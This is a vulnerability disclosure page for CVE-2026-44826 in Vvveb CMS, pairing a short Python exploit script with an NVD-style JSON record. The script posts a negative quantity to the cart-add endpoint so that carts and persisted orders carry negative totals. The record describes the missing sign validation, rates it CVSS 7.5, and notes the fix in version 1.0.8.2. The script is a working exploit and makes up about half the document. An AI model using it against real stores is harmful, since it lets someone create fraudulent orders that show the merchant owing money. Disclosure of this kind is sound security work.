CVE-2026-44826

import requests def exploit_negative_quantity(target_url): # The endpoint to add item to cart endpoint = "/index.php?module=cart&action=add" # Payload with negative quantity payload = { "product_id": "1", # Valid product ID "quantity": -1 # Negative integer to exploit logic flaw } try: response = requests.post(target_url + endpoint, data=payload) if response.status_code == 200: print("[+] Request sent. Check cart total for negative balance.") print(f"[+] Response: {response.text[:200]}") else: print("[-] Request failed.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Replace with actual target exploit_negative_quantity("http://localhost:8080")

{"cve": {"id": "CVE-2026-44826", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:00.913", "lastModified": "2026-05-15T22:16:53.610", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.2, Vvveb CMS does not validate the sign of the quantity parameter on the cart-add endpoint. Submitting a negative integer is accepted by the server and treated as a normal positive line-item, but with the sign carried through into every downstream computation: line total, sub-total, taxes, and grand total all become negative numbers. The customer-facing cart UI then displays a negative grand total to the user, the checkout flow accepts the negative cart, and the resulting order is persisted in the merchant's database with a negative total column. From the merchant's order management dashboard, this surfaces as a real order with a negative total — an \"the merchant owes the customer money\" record that no legitimate workflow ever creates. This vulnerability is fixed in 1.0.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-75x2-j47j-mg8j", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-75x2-j47j-mg8j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}